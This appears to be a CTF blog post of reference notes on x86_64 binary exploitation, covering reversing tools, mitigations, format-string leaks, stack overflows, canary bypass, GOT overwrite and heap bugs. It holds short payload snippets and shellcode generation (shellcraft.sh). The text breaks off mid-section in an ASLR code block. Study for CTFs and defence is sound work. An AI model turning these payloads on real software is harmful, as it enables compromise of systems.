Binary Exploitation - Architecture, Reversing, Exploitation & Shellcode

Posted on 2026-05-03 in ctf

x86_64 Architecture & Stack

Byte Order & Packing

x86 and x86_64 are little-endian, so Linux CTF binaries on these architectures store the least significant byte at the lowest address.
0x40123a packed as 64-bit little-endian becomes 3a 12 40 00 00 00 00 00.
This matters for partial overwrites: overflowing byte-by-byte overwrites the low bytes of a saved pointer first.

from pwn import *

p8(0x41)                 # b'A'
p16(0x1234)              # b'4\x12'
p32(0xdeadbeef)          # b'\xef\xbe\xad\xde'
p64(0x40123a)            # b':\x12@\x00\x00\x00\x00\x00'

u64(leak.ljust(8, b'\x00'))
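Where pwntools is not available, the same packing can be sketched with the standard library's struct module. The 3-byte leak below is a made-up value for illustration.

```python
import struct

# "<" selects little-endian; "Q" is an unsigned 64-bit integer.
packed = struct.pack("<Q", 0x40123A)
print(packed.hex(" "))          # 3a 12 40 00 00 00 00 00

# A leaked pointer is often shorter than 8 bytes because output stops at the
# first NUL, so pad the missing high bytes on the right before unpacking.
leak = bytes.fromhex("3a1240")  # hypothetical 3-byte leak
addr = struct.unpack("<Q", leak.ljust(8, b"\x00"))[0]
print(hex(addr))                # 0x40123a
```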

Registers

word = 2 bytes, dword = 4 bytes, qword = 8 bytes
RBP: frame/base pointer, RSP: stack pointer, RIP: instruction pointer.
Writing to 32-bit registers (e.g., EAX) automatically clears the upper 32 bits of the corresponding 64-bit register (RAX). xor EAX, EAX is equivalent to xor RAX, RAX but has a shorter encoding.
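The partial-register rules can be modelled in a few lines. This is only a sketch of the semantics (the helper name write_reg is hypothetical), not an emulator: 32-bit writes zero-extend, while 8- and 16-bit writes keep the upper bits.

```python
MASK64 = (1 << 64) - 1

def write_reg(rax: int, value: int, bits: int) -> int:
    """Return the new 64-bit RAX after writing `value` to its low `bits` bits."""
    if bits == 64:
        return value & MASK64
    if bits == 32:
        # 32-bit writes zero-extend into the full 64-bit register.
        return value & 0xFFFFFFFF
    # 8-bit (AL) and 16-bit (AX) writes leave the remaining upper bits untouched.
    low_mask = (1 << bits) - 1
    return (rax & ~low_mask & MASK64) | (value & low_mask)

rax = 0x1122334455667788
print(hex(write_reg(rax, 0, 32)))      # 0x0
print(hex(write_reg(rax, 0, 16)))      # 0x1122334455660000
print(hex(write_reg(rax, 0x3B, 8)))    # 0x112233445566773b
```

The last line is why mov al, 0x3b only yields RAX = 59 when the rest of RAX is already zero.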

Memory access sizes:

mov [RAX], bl    ; 1 byte
mov [RAX], bx    ; 2 bytes (word)
mov [RAX], ebx   ; 4 bytes (dword)
mov [RAX], rbx   ; 8 bytes (qword)

Calling Convention (SysV ABI)

Arguments: RDI, RSI, RDX, RCX, R8, R9.
Return Value: RAX (with RDX potentially holding high bits or extra data).
Syscall arguments: RDI, RSI, RDX, R10, R8, R9; syscall number in RAX.
RCX and R11 are clobbered by syscall.
x86_32: Arguments are passed via the stack in right-to-left order.

man syscall
grep -R "__NR_execve" /usr/include/asm* /usr/include/x86_64-linux-gnu/asm* 2>/dev/null

REX.W Prefix (0x48)

The REX prefix range is 0x40-0x4F (0100 WRXB), used to extend x86 instructions to 64-bit:

W: Set to 1 for 64-bit operations.
R, X, B: Extension for register addressing (R8-R15).

mov RDI, RSP requires a REX prefix with W=1 → 0100 1000 = 0x48.
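The bit layout 0100 WRXB can be checked with a small helper. The function name rex is an illustrative choice, not part of any library.

```python
def rex(w: int = 0, r: int = 0, x: int = 0, b: int = 0) -> int:
    """Build a REX prefix byte from its four flag bits: 0100WRXB."""
    return 0x40 | (w << 3) | (r << 2) | (x << 1) | b

print(hex(rex(w=1)))            # 0x48: 64-bit operand size, no extended registers
print(hex(rex(w=1, b=1)))       # 0x49: 64-bit operand, extended r/m register (R8-R15)
print(hex(rex(w=1, r=1, b=1)))  # 0x4d: both reg and r/m fields extended
```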

Stack Frame Layout

RBP (Register): Points to the bottom of the current function stack frame. Local variables are accessed relative to it (e.g., [RBP - 0x10]).
saved RBP (Stack Data): A backup of the caller's RBP, used to restore the previous frame upon return.

Prologue & Epilogue

; Prologue (Entering Function B)
push RBP        ; Save Caller A's RBP -> becomes saved RBP
mov RBP, RSP    ; Establish B's stack frame

; Epilogue (Exiting Function B) - Equivalent to 'leave; ret'
mov RSP, RBP    ; Clean up local variables
pop RBP         ; Restore Caller A's RBP
ret             ; Return to Caller A

High Addr  +-------------------------------+
           |  Caller's Stack Frame         |
           +-------------------------------+
           |  return address               |  ← call instruction auto-push
           +-------------------------------+
           |  saved RBP                    |  ← stores caller's RBP
           +-------------------------------+  ← reg RBP points here
           |  local variables              |  ← accessed via [RBP - offset]
           +-------------------------------+  ← reg RSP (stack top)
Low Addr   |  (unused)                     |
           +-------------------------------+
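The prologue and epilogue can be traced with a tiny stack model. This is a sketch: all addresses are made up, and the Stack class is a hypothetical helper that only tracks 8-byte slots. It shows that [RBP] holds the saved RBP and [RBP+8] the return address.

```python
class Stack:
    """Tiny model of a downward-growing stack of 8-byte slots."""

    def __init__(self, top: int):
        self.mem = {}
        self.rsp = top

    def push(self, value: int) -> None:
        self.rsp -= 8
        self.mem[self.rsp] = value

    def pop(self) -> int:
        value = self.mem[self.rsp]
        self.rsp += 8
        return value

st = Stack(top=0x7FFFFFFFE000)   # hypothetical stack pointer inside caller A
rbp = 0x7FFFFFFFE100             # caller A's frame pointer (hypothetical)

st.push(0x401234)                # call B: pushes the return address (hypothetical)
st.push(rbp)                     # push rbp
rbp = st.rsp                     # mov rbp, rsp
st.rsp -= 0x20                   # sub rsp, 0x20 (room for locals)

saved_rbp_slot, ret_slot = rbp, rbp + 8

st.rsp = rbp                     # leave, part 1: mov rsp, rbp
rbp = st.pop()                   # leave, part 2: pop rbp
rip = st.pop()                   # ret

print(hex(rbp), hex(rip), hex(st.rsp))
```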

Memory Management

Segments

.text: Executable code.
.data: Initialized global writable data.
.rodata: Read-only data (strings, constants).
.bss: Uninitialized global writable data.
stack: Local variables and function metadata.
heap: Dynamically allocated memory via malloc().

Viewing memory maps:

cat /proc/<pid>/maps
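When scripting, the maps file can be parsed directly. The sketch below assumes the usual field order (address range, permissions, offset, device, inode, optional path); the sample line is illustrative and parse_maps_line is a hypothetical helper name.

```python
def parse_maps_line(line: str) -> dict:
    """Parse one /proc/<pid>/maps line into start, end, perms, offset, and path."""
    fields = line.split(maxsplit=5)
    start, end = (int(x, 16) for x in fields[0].split("-"))
    return {
        "start": start,
        "end": end,
        "perms": fields[1],
        "offset": int(fields[2], 16),
        "path": fields[5].strip() if len(fields) > 5 else "",
    }

# Sample line in the maps format (values are illustrative).
sample = "555555554000-555555555000 r--p 00000000 08:01 1234 /home/user/chall"
entry = parse_maps_line(sample)
print(hex(entry["start"]), entry["perms"], entry["path"])

# On Linux, the same parser works on the current process:
# with open("/proc/self/maps") as f:
#     for line in f:
#         print(parse_maps_line(line))
```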

Von Neumann Architecture

In memory, bytes can represent either code or data; the CPU distinguishes them solely based on RIP. Bytes pointed to by RIP are executed as opcodes, while others accessed via pointers are treated as data.

Security Mitigations

Name	Description
NX	No-eXecute bit. Hardware-level page attribute marking memory pages as non-executable.
W^X	Write XOR Execute. Memory is either writable or executable, never both simultaneously.
ASLR	Address Space Layout Randomization. Randomizes memory layout at runtime.
PIE	Position Independent Executable. Lets ASLR randomize the base address of the `binary` itself.
canary	Stack protector. Detects `buffer overflow` by checking a secret value before returning.

Checksec Reading

Mitigation	Exploitation impact
No Canary	Saved `RIP` overwrite is usually direct once the offset is known.
Canary	Need leak, byte brute-force, non-return control flow, or write primitive that skips the canary.
NX disabled	Stack/heap shellcode is viable if control can jump to it.
NX enabled	Prefer ROP, ret2libc, `mprotect`, `mmap`, JOP/COP, or existing executable regions.
No PIE	Binary code addresses are fixed, e.g. `win()` / gadgets / PLT have stable absolute addresses.
PIE enabled	Need code pointer leak, PIE base recovery, or partial overwrite/brute force.
No RELRO	GOT is writable and can be overwritten before/after resolution.
Partial RELRO	`.got.plt` remains writable; lazy binding is still present.
Full RELRO	GOT is read-only after startup; GOT overwrite is blocked.
SHSTK	Intel CET shadow stack verifies returns; classic `ret` overwrite/ROP may fail.
IBT	Intel CET indirect branch tracking requires indirect-call/jump targets to begin with `endbr64`.

checksec hints at the easiest path, but it is not a proof. A binary with executable stack may still be protected by SHSTK/IBT, input filters, unstable stack addresses, or non-return exits.

ELF & Dynamic Linking

ELF header: architecture, entry point, program headers.
Program headers: loader view; maps segments into memory (LOAD, GNU_STACK, GNU_RELRO).
Section headers: linker/debugger view; useful for .text, .plt, .got, .bss, symbols.
PLT: stubs in the binary used to call imported functions.
GOT: table of resolved function/data addresses.
Lazy binding: first PLT call jumps into the dynamic resolver, which writes the real libc address into GOT.
RELRO: controls whether relocation/GOT pages become read-only after relocation.

file ./chall
readelf -h ./chall
readelf -l ./chall
readelf -S ./chall
readelf -s ./chall
readelf -r ./chall       # relocations / GOT targets
objdump -d ./chall | less
objdump -R ./chall       # dynamic relocations
strings -a ./chall | less
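The PIE question can also be answered from the ELF header alone: e_type sits right after the 16-byte e_ident and is ET_EXEC (2) for a fixed-address executable or ET_DYN (3) for a PIE or shared object. A minimal sketch, assuming a little-endian ELF and using a synthetic header instead of a real file:

```python
import struct

ET_EXEC, ET_DYN = 2, 3

def elf_type(header: bytes) -> str:
    """Classify an ELF by e_type (2 bytes at offset 16). Assumes little-endian."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    (e_type,) = struct.unpack_from("<H", header, 16)
    if e_type == ET_EXEC:
        return "non-PIE executable"
    if e_type == ET_DYN:
        return "PIE or shared object"
    return f"other (e_type={e_type})"

# Synthetic prefix: magic, class=64-bit, data=LSB, version, 9 padding bytes, e_type.
fake = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9) + struct.pack("<H", ET_DYN)
print(elf_type(fake))   # PIE or shared object
```

For a real target, pass the first 18 bytes of the file, e.g. open("./chall", "rb").read(18).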

Address Translation

VA: virtual address used at runtime.
RVA / offset inside module: runtime_addr - module_base.
File offset: byte offset in the ELF file; not always equal to RVA because segments have mapping alignment.

In a non-PIE ELF, .text often loads near 0x400000. In a PIE ELF, disassemblers may show offsets such as 0x1d08; runtime address is pie_base + 0x1d08.

piebase
breakrva 0x1d08
vmmap
xinfo 0x555555555d08
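The two conversions above can be sketched as follows. The segment table is hypothetical (real values come from readelf -l), and LoadSegment, rva_to_runtime, and vaddr_to_file_offset are illustrative names.

```python
from dataclasses import dataclass

@dataclass
class LoadSegment:
    vaddr: int    # p_vaddr from the program header
    offset: int   # p_offset (position in the file)
    filesz: int   # p_filesz

def rva_to_runtime(pie_base: int, rva: int) -> int:
    """Runtime address of an offset inside a PIE module."""
    return pie_base + rva

def vaddr_to_file_offset(vaddr: int, segments: list) -> int:
    """Map a link-time virtual address to a file offset via PT_LOAD segments."""
    for seg in segments:
        if seg.vaddr <= vaddr < seg.vaddr + seg.filesz:
            return vaddr - seg.vaddr + seg.offset
    raise ValueError("address is not backed by file contents")

# Hypothetical PT_LOAD layout; the last segment shows vaddr != file offset.
segs = [
    LoadSegment(0x0000, 0x0000, 0x628),
    LoadSegment(0x1000, 0x1000, 0xE15),
    LoadSegment(0x3DE8, 0x2DE8, 0x248),
]
print(hex(rva_to_runtime(0x555555554000, 0x1D08)))   # 0x555555555d08
print(hex(vaddr_to_file_offset(0x3E00, segs)))        # 0x2e00
```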

Binary Analysis & Tools

CLI Tools

file hello        # Identify arch, linking, stripped status
strip hello       # Remove symbols
nm -a hello       # Show symbol tables
checksec --file=hello
ltrace ./hello    # Trace library calls
strace ./hello    # Trace system calls
strings -a hello  # Extract printable strings
readelf -a hello  # ELF metadata
objdump -d hello  # Disassembly

Reverse Engineering Workflow

Identify: file, checksec, readelf -h, rabin2 -I.
Triage strings/imports: strings, rabin2 -zz, rabin2 -i, IDA/Ghidra strings window.
Find control points: main, parser loop, comparison branches, win, system, /bin/sh, open/read/write, strcmp, memcmp, printf.
Recover input format: header magic, version, command/directive fields, length fields, endian, per-record size.
Trace data flow: where user bytes land, how size is computed, where pointers are stored, whether data is copied, validated, freed, or printed.
Convert checks into constraints: compare constants, printable-byte filters, checksums, jump tables, index math, bounds checks.
Exploit mapping: choose leak/write/control-flow primitive that matches mitigations.

Useful questions while reversing:

Is the binary stripped? If not, start with symbols. If stripped, start with imports, strings, and cross-references.
Does the program return normally, call exit, or loop forever? Return-address hijacking only triggers on a return path.
Does a length check use signed or unsigned comparison? Which width: byte, word, dword, or qword?
Are there hidden repeat/backdoor paths that re-enter the vulnerable function before canary validation?
Does a parser use a switch/jump table? Can an out-of-range or special directive reach extra code?

radare2 Quick Reference

rax2 0x28                         # Hex/decimal conversion
rabin2 -I ./chall                 # Binary info
rabin2 -z ./chall                 # Data-section strings
rabin2 -zz ./chall                # All strings
rabin2 -i ./chall                 # Imports
rabin2 -e ./chall                 # Entry points
r2 -A ./chall                     # Analyze and open
r2 -w ./chall                     # Open writable for patching
r2 -A -q -c "pdf @ main" ./chall # Non-interactive disassembly

Inside r2:

aaa             # Full analysis
afl             # List functions
s main          # Seek to symbol/address
s -             # Seek back
pdf             # Print current function
pdf @ sym.main  # Print a function
pd 20           # Print 20 instructions
px 64           # Hexdump
iz              # Strings in data sections
izz             # Strings in whole binary
axt @ addr      # Cross-references to address
axf @ addr      # Cross-references from address
VV              # Visual graph
wx 909090       # Patch raw bytes (requires -w)
wa nop          # Assemble and patch instruction (requires -w)

Patching Notes

Patching data is safer than patching code when the target check compares constants or file-format bytes.
For code patches, inspect instruction length first; replacing a longer conditional branch with shorter bytes needs padding with nop.
In non-PIE ELF, runtime VA is often near file mapping base 0x400000; still convert VA to file offset using program headers or tooling instead of guessing.

rasm2 -a x86 -b 64 "nop"
rasm2 -a x86 -b 64 -d "90"
objdump -d -Mintel ./chall | less

Pwndbg

pwndbg /path/to/binary    # Launch
start                     # Break at main (fails if no main symbol)
starti                    # Break at first instruction (initialization code)
entry                     # Break at ELF entry point
info functions            # List all analyzed function symbols
info frame                # Show current stack frame
piebase                   # Show PIE base address
vmmap                     # Show memory layout (r-x, rw-, etc.)
breakrva 0x19e3           # Break at Relative Virtual Address (useful for PIE)
stack                     # Show stack
canary                    # Print and find canaries on the stack
context <section>         # Show specific context window
checksec                  # Check for security features (NX, ASLR, PIE, Canary)
cyclic 100                # Generate 100-byte De Bruijn sequence
cyclic -l 0x6161616c      # Find overflow offset using crash address
retaddr                   # Highlight return addresses in the current stack frame
rop                       # Simple ROP Gadget search
got                       # Show GOT state (resolved vs unresolved)
plt                       # View Procedure Linkage Table
heap                      # Overview of all heap chunks and their status
bins                      # View free lists (fastbins, unsorted, small, large, tcache)
arena                     # View detailed structure of the main arena (malloc_state)

p $rsp                    # Show current stack pointer
disass main               # Disassemble 'main' function
break *main+123           # Breakpoint at main+123

Category	Command
Stepping	`n` (step over), `s` (step into), `fin` (finish), `c` (continue)
Breakpoints	`b *main+123`, `b <symbol>`
Memory	`x/11s <addr>`, `hexdump <addr> 44`, `tele <addr>`
Info	`context`, `vmmap`, `xinfo <addr>`, `checksec`

My ~/.gdbinit:

source /usr/share/pwndbg/gdbinit.py
set history save on
set follow-fork-mode child
set disassembly-flavor intel

# may be useless
set $mybase1 = 0x0000555555554000
set $mybase = 0x7ffff7ffc000

python
import os
import atexit
import pwndbg
from pwndbg.commands.context import contextoutput

if 'TMUX' in os.environ:
    created_panes = []

    def create_pane(split_cmd):
        output = os.popen(split_cmd).read().strip()
        if not output: return None, None
        pane_id, tty = output.split(":")
        created_panes.append(pane_id)
        return pane_id, tty

    p_disasm_id, p_disasm_tty = create_pane('tmux split-window -vb -P -F "#{pane_id}:#{pane_tty}" -l 75% -d "cat -"')
    p_stack_id, p_stack_tty = create_pane(f'tmux split-window -v -P -F "#{{pane_id}}:#{{pane_tty}}" -l 40% -t {p_disasm_id} -d "cat -"')
    p_bt_id, p_bt_tty = create_pane('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -t -1 -l 30% -d "cat -"')
    p_regs_id, p_regs_tty = create_pane(f'tmux split-window -h -P -F "#{{pane_id}}:#{{pane_tty}}" -t {p_stack_id} -l 30% -d "cat -"')
    p_ipy_id, p_ipy_tty = create_pane('tmux split-window -h -P -F "#{pane_id}:#{pane_tty}" -l 30% -d "ipython"')

    if p_disasm_tty: contextoutput("disasm", p_disasm_tty, True, 'top', False)
    if p_stack_tty:  contextoutput("stack", p_stack_tty, True, 'top', False)
    if p_bt_tty:     contextoutput("backtrace", p_bt_tty, True, 'top', False)
    if p_regs_tty:   contextoutput("regs", p_regs_tty, True, 'top', False)

    if p_stack_tty: contextoutput("legend", p_stack_tty, True)
    if p_regs_tty:  contextoutput("expressions", p_regs_tty, True, 'top', False)

    def cleanup_panes():
        for pid in created_panes:
            os.system(f"tmux kill-pane -t {pid} >/dev/null 2>&1")

    atexit.register(cleanup_panes)
else:
    print("\n[\033[33m*\033[0m] Not running inside TMUX. Standard pwndbg output will be used.")

pwndbg.config.context_disasm_lines.value = 25
pwndbg.config.context_stack_lines.value = 18
end

pwntools

from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
p = gdb.debug("./vuln", gdbscript="b *main+1\nc")
p.send(cyclic(123))
offset = cyclic_find(0x6161616a) # Finds 'jaaa'

import IPython
IPython.embed() # Launch IPython
# leak  = u64(p.recvline(keepends=False).ljust(8, b'\x00'))

sc = asm(shellcraft.sh())
sc = asm(shellcraft.cat("/flag"))
sc = asm(shellcraft.chmod("/flag", 0o444))

View shellcraft:

pwn shellcraft -l
# Output format (default: hex), choose from {e}lf, {r}aw, {s}tring, {c}-style array, {h}ex string, hex{i}i, {a}ssembly code, {p}reprocessed code, escape{d} hex string
pwn shellcraft amd64.linux.sh -f d

De Bruijn Sequence (Cyclic)

A De Bruijn sequence \(B(k, n)\) is a cyclic sequence where every possible string of length \(n\) over an alphabet of size \(k\) appears exactly once.

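Why it's used: When a binary crashes due to a buffer overflow, the saved return address has been overwritten by a 4- or 8-byte chunk of the sequence. Since every chunk is unique, cyclic_find can determine the exact offset needed for the exploit. On x86_64 the chunk is usually a non-canonical address, so ret faults before RIP changes; read the qword at the top of the stack (RSP) instead of RIP.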

Crash-offset workflow:

from pwn import *

context.arch = "amd64"
p = process("./chall")
p.send(cyclic(300))
p.wait()

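# In GDB/pwndbg, read the qword at [RSP] at the faulting ret (or the overwritten EIP on 32-bit), then:
offset = cyclic_find(0x6161616c)      # default n=4: look up the 4-byte chunk 'laaa'
# An 8-byte lookup only matches a pattern generated with cyclic(300, n=8):
offset = cyclic_find(p64(0x6161616161616162), n=8)   # 'baaaaaaa'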

For 64-bit patterns, keep n consistent between generation and lookup if you use non-default subsequence size.
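To see why the lookup works, here is a self-contained sketch of the standard Lyndon-word construction of a De Bruijn sequence over the lowercase alphabet, plus a naive offset search. The names de_bruijn, pattern, and find_offset are illustrative; pwntools' own implementation may differ in detail.

```python
import string
from itertools import islice

def de_bruijn(alphabet: bytes, n: int):
    """Yield the bytes of a De Bruijn sequence B(k, n) over `alphabet`."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)

def pattern(length: int, n: int = 4) -> bytes:
    """First `length` bytes of the sequence."""
    return bytes(islice(de_bruijn(string.ascii_lowercase.encode(), n), length))

def find_offset(chunk: bytes, n: int = 4, limit: int = 10000) -> int:
    """Offset of the first n bytes of `chunk` in the pattern, or -1."""
    return pattern(limit, n).find(chunk[:n])

print(pattern(16))                                      # b'aaaabaaacaaadaaa'
print(find_offset((0x6161616C).to_bytes(4, "little")))  # 44 ('laaa')
```

Because every n-byte window occurs once, a single crash value is enough to recover the offset, as long as generation and lookup use the same n.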

Environment Control

Disable ASLR for Debugging: gdb disables ASLR by default. For a clean environment, use setarch x86_64 -R /bin/bash to spawn a shell where all child processes (excluding SUID) have ASLR disabled.
SUID Trap: gdb cannot disable ASLR for SUID binaries due to kernel security. Remove the SUID bit (chmod u-s) or copy the binary to a local directory before debugging.
Global ASLR Toggle: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space (Reset to 2 when finished).

Environment affects stack addresses. argv[0] length, environment variables, terminal, and pwntools launching mode can shift stack buffers. Use env={} in process() or add a NOP sled when stack shellcode depends on approximate addresses.

Information Disclosure Causes

String Termination Problems

C strings are null-terminated, meaning they lack length metadata and rely on a 0x00 byte to mark the end.

Missing Null byte: If a program reads exactly \(N\) bytes into an \(N\)-byte buffer (e.g., using read()), it won't append a null byte.
Disclosure: Functions like printf("%s") will continue reading past the buffer until they hit a null byte, potentially leaking adjacent sensitive data like a flag or canary.
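The effect can be simulated with a flat byte string standing in for memory. This is a model of the behaviour, not real C; the secret value and c_string_at are made up for illustration.

```python
def c_string_at(memory: bytes, start: int) -> bytes:
    """Mimic printf("%s"): read from `start` until the first NUL byte."""
    end = memory.index(b"\x00", start)
    return memory[start:end]

BUF_SIZE = 8
secret = b"S3CR3T\x00"                        # hypothetical data placed right after the buffer

# Short input: the terminator fits inside the buffer.
memory = b"hi\x00".ljust(BUF_SIZE, b"\x00") + secret
print(c_string_at(memory, 0))                 # b'hi'

# read() filled all 8 bytes, so there is no terminator inside the buffer.
memory = b"A" * BUF_SIZE + secret
print(c_string_at(memory, 0))                 # b'AAAAAAAAS3CR3T'
```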

Uninitialized Data (Stack Frame Reuse)

Frame Persistence: When a function returns, its stack frame is not cleared. The RSP simply moves back up.
Ghost Data: If a subsequent function call allocates a frame over the same memory area and fails to initialize its variables, it can read or "leak" the "ghost" data left by the previous function.

Compiler Backstabbing (Dead Store Elimination)

The Trap: A developer might use memset(buf, 0, size) to clear a sensitive flag before a function returns.
DSE: If the compiler (with -O2 or -O3) determines that buf is never accessed again before the function returns, it may "optimize out" the memset entirely, leaving the secret data on the stack. Use explicit_bzero(), memset_s(), or a volatile write followed by a compiler barrier to prevent this; -fno-inline does not disable dead store elimination.

Format String Leaks

printf(user_input) treats user bytes as a format string. This can leak stack/register values and, with %n, write memory.

%p %p %p %p              # leak pointers
%lx.%lx.%lx              # leak words
%7$sAAAA<addr>           # read string from controlled address, offset depends on stack layout
%hn / %hhn / %n          # write the count as 2 / 1 / 4 bytes (%ln or %lln for 8)

Pwntools helpers:

from pwn import *

offset = FmtStr(exec_fmt).offset
payload = fmtstr_payload(offset, {elf.got["printf"]: libc.sym["system"]})

Common path with writable GOT: leak a libc address, calculate libc.address, then overwrite printf@GOT/puts@GOT with system or an offset into win.
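The arithmetic behind a byte-wise %hhn write is worth seeing once, even though fmtstr_payload automates it. The sketch below only builds the directive part and assumes the target addresses addr, addr+1, ... already sit at consecutive argument positions starting at first_arg; arranging that is target-specific. plan_hhn_writes is a hypothetical helper name.

```python
def plan_hhn_writes(value: int, nbytes: int, first_arg: int, already_written: int = 0) -> str:
    """Return format directives that write `value` one byte at a time with %hhn."""
    out = []
    written = already_written
    for i in range(nbytes):
        target = (value >> (8 * i)) & 0xFF
        pad = (target - written) % 256       # %hhn stores the output count modulo 256
        if pad:
            out.append(f"%{pad}c")           # emit `pad` more characters
        out.append(f"%{first_arg + i}$hhn")  # store the low byte of the count
        written += pad
    return "".join(out)

# Write the three low bytes of a hypothetical address 0x401256.
print(plan_hhn_writes(0x401256, 3, first_arg=10))
# %86c%10$hhn%188c%11$hhn%46c%12$hhn
```

Each padding value is the distance to the next target byte modulo 256, which is why the byte values do not need to be written in ascending order.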

Memory Corruption Primitives

Stack Buffer Overflow

Typical offset calculation:

buf = rbp - 0x60
saved RBP = rbp
return address = rbp + 8
offset_to_ret = 0x60 + 8

Ret2win payload:

payload = b"A" * offset_to_ret + p64(elf.sym["win"])

If win_authed(token) checks a stack/local token, sometimes jump past the check instead of calling the function entry. This is an offset jump. Make sure the target instruction does not depend on skipped setup.

Canary Bypass Patterns

Direct leak: program prints past the canary because the input overwrote its leading \x00 terminator.
Residual stack leak: another function leaves a canary copy or secret in reused stack memory.
Recursive/retry path: trigger a path that re-enters vulnerable code before the outer canary is checked.
Fork brute-force: child crashes do not randomize parent canary; brute-force byte-by-byte.
Skip canary write zone: corrupt loop index, pointer, length, or destination so writes land after the canary.

Stack canary on amd64 usually has a null low byte. Leak reconstruction often looks like:

canary = u64(b"\x00" + leak7)
payload = flat(b"A" * off, canary, b"B" * 8, target)
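The same reconstruction, written with only the standard library so the byte layout is explicit. The leaked bytes, offset, and target address are hypothetical, as are the helper names.

```python
import struct

def rebuild_canary(leak7: bytes) -> int:
    """Prepend the NUL low byte that the leak skipped and unpack as little-endian."""
    if len(leak7) != 7:
        raise ValueError("expected exactly 7 leaked bytes")
    return struct.unpack("<Q", b"\x00" + leak7)[0]

def canary_payload(off: int, canary: int, target: int) -> bytes:
    """Overflow layout: filler, intact canary, saved RBP, new return address."""
    return b"".join([
        b"A" * off,                   # fill up to the canary
        struct.pack("<Q", canary),    # write the canary back unchanged
        b"B" * 8,                     # saved RBP (value usually irrelevant)
        struct.pack("<Q", target),    # new return address
    ])

leak7 = bytes.fromhex("11223344556677")      # hypothetical leaked bytes
canary = rebuild_canary(leak7)
print(hex(canary))                           # 0x7766554433221100
payload = canary_payload(0x48, canary, 0x401256)
print(len(payload))                          # 96
```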

Signedness & Integer Bugs

Danger pattern: check in signed arithmetic, use in unsigned API.

int size;
scanf("%d", &size);
if (size <= 64) {
    read(0, buf, size);   // size converted to size_t
}

-1 passes size <= 64, then becomes 0xffffffffffffffff as size_t.
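The conversion can be reproduced with ctypes, which wraps values without overflow checks. The sketch assumes a 32-bit int and a 64-bit size_t, as on Linux amd64.

```python
import ctypes

def passes_check(size: int) -> bool:
    """The signed comparison from the C snippet: size <= 64."""
    return ctypes.c_int(size).value <= 64

def as_size_t(size: int) -> int:
    """int -> size_t: sign-extend to 64 bits, then reinterpret as unsigned."""
    return ctypes.c_uint64(ctypes.c_int(size).value).value

for s in (32, 65, -1):
    print(s, passes_check(s), hex(as_size_t(s)))
# 32 True 0x20
# 65 False 0x41
# -1 True 0xffffffffffffffff
```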

Integer multiplication overflow:

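uint32_t bytes = count * record_size;   // product truncated to 32 bits
if (bytes <= sizeof(buf))
    read(0, buf, count * record_size);  // full-width product when the operands are wider than 32 bits (e.g. size_t)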

If multiplication truncates before the check but the later copy/read uses the larger semantic size, bounds checks fail.
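A concrete pair of values makes the mismatch visible. The numbers are chosen for illustration and assume the operands are 64-bit while the checked variable is 32-bit.

```python
def checked_bytes_u32(count: int, record_size: int) -> int:
    """Value seen by the bounds check: the product stored in a uint32_t."""
    return (count * record_size) & 0xFFFFFFFF

count, record_size, buf_size = 0x10000001, 16, 64
truncated = checked_bytes_u32(count, record_size)
real = count * record_size

print(hex(truncated), truncated <= buf_size)   # 0x10 True  (check passes)
print(hex(real))                               # 0x100000010 (size actually used)
```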

OOB Indexing

Negative index can read/write before an array.
Positive overlarge index can reach later locals, heap metadata, GOT, vtables, function pointers, or adjacent objects.
Convert byte distance to index by dividing by element size.

index = (target_addr - array_base) // element_size
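A slightly fuller sketch adds an alignment check and shows how a negative index looks when the program reads it as an unsigned 32-bit value. All addresses are hypothetical, and oob_index and as_unsigned are illustrative names.

```python
def oob_index(target_addr: int, array_base: int, element_size: int) -> int:
    """Element index that makes array[index] alias target_addr."""
    distance = target_addr - array_base
    if distance % element_size:
        raise ValueError("target is not aligned to an element boundary")
    return distance // element_size

def as_unsigned(index: int, bits: int = 64) -> int:
    """Two's-complement view of a (possibly negative) index."""
    return index & ((1 << bits) - 1)

array_base = 0x404080                         # hypothetical global array of 8-byte entries
print(oob_index(0x4040C0, array_base, 8))     # 8
idx = oob_index(0x404018, array_base, 8)      # hypothetical GOT slot below the array
print(idx, hex(as_unsigned(idx, 32)))         # -13 0xfffffff3
```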

Partial Pointer Overwrite

Partial overwrite changes only low bytes of a pointer. Useful when high bytes are stable due to page alignment or same mapping.

payload = b"A" * offset + p16(target_low_16)

This works best when source and destination are in the same module/stack/heap region or when only the low page offset must change.
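The effect on the stored pointer can be modelled by splicing bytes into its little-endian representation. The pointer value is hypothetical and partial_overwrite is an illustrative helper.

```python
import struct

def partial_overwrite(pointer: int, low_bytes: bytes) -> int:
    """Pointer value after an overflow replaces only its lowest bytes."""
    raw = bytearray(struct.pack("<Q", pointer))
    raw[:len(low_bytes)] = low_bytes             # the overflow reaches the low bytes first
    return struct.unpack("<Q", bytes(raw))[0]

saved_ret = 0x555555555A3C                       # hypothetical saved return address
print(hex(partial_overwrite(saved_ret, b"\x08")))                     # 0x555555555a08
print(hex(partial_overwrite(saved_ret, struct.pack("<H", 0x5D08))))   # 0x555555555d08
```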

GOT Overwrite

Requirements:

GOT target must be writable (No RELRO, or Partial RELRO where .got.plt stays writable).
A write primitive reaches the target GOT entry.
The overwritten function is called after the overwrite.

Common targets:

printf@GOT -> system, then pass "/bin/sh" or a command string to printf.
puts@GOT -> win + offset, but avoid recursion if win itself calls puts first.

Heap Bug Classes

UAF: use a pointer after free; can become type confusion if the freed chunk is reallocated as another object.
Double free: same chunk inserted into a free list twice; allocator-dependent exploitability.
Overflow into metadata/object: corrupt size, next pointer, function pointer, vtable, length, or data pointer.
Aliased backing store: a high-level view (ArrayBuffer, slice, sprite, ledger view) still references native heap memory after resize/free.

Pwndbg commands:

heap
vis_heap_chunks
bins
tcachebins
fastbins
unsortedbin
arena

ASLR & Bypass Techniques

Method 1: Memory Leak

Despite ASLR, the relative offset between functions and data within the same module remains constant.

Leak a known pointer (e.g., a function address in the GOT).
Subtract its constant offset to find the base address.
Calculate the addresses of all other gadgets/functions.
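These three steps reduce to one subtraction and one sanity check: a correct module base is page-aligned. The leaked address and symbol offsets below are invented for illustration; real offsets come from the target's libc.

```python
PAGE = 0x1000

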